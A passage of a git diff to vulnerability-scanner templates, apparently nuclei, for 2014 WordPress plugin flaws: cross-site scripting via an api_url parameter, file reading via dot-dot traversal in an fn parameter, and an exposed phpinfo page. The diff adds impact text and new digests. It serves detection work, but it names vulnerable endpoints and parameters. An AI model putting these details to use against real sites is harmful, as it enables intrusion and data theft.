vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to WooCommerce Swipe plugin version 2.7.2 or later to mitigate this vulnerability. reference: @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022078964445dd9a6a3593869597ea089036752028ee3f3d159f6d5566151056430a022100eb6052dc6ccc6970789459d0c55d2a3ccf9a7c879e676419804fd192b92e85ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022011cf10d2dca5ad1bfbafb9189c4e9e94a4ff5251092564acfc7eb9be066a59a402201ba84244ed93964ca7562d9622b1199d64197ec0e2ca3e9f2718588a8e0c2bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index d32ddbc9a7..bfb094135e 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the plugin's output, potentially leading to the execution of arbitrary code or stealing sensitive information. remediation: | Upgrade to a patched version of the Ultimate Weather Plugin that addresses the XSS vulnerability. reference: @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220656a765b3d6ea9c77a27fadcea6d6216fd497dacfd67351d47115a77ba006d9c0221009ec8e8d5551f5b5b6b69f6fcde213631625824278da4302b6ac93ca11174632d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022042aa2ddd1022544d8185c099e43d84553656bb11fbaeb242bd651b484c72205202203f36ad98e74813720a2296cbd40314a62cbd6bf9a035af5f72212da73f512846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index b9e1c9161b..5cf2ff65ff 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Update to the latest version of the Tera Charts plugin to fix the local file inclusion vulnerability. reference: @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a3c87ebe1997f2f85335f10f396664725af3109be9afdacdc1b9ba3461ee1e5c022100e57651aff4bf12a6a253995e1953db6404726660434b67e9fcbf4fbb6eec850c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100939d2492f177511e28f9ca4f04b091c26b2840e2752c100c18e5f7607e0e99690220291f5aeece7127eb31b4fe976f62f4f111784d098337e2a3199815b06d4bfb76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index f03d407cc6..a2a410c66a 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. + impact: | + An attacker can gain sensitive information from the target system. remediation: | Upgrade to WordPress EasyCart version 2.0.6 or later. reference: @@ -53,4 +55,4 @@ http: group: 1 regex: - '>PHP Version <\/td>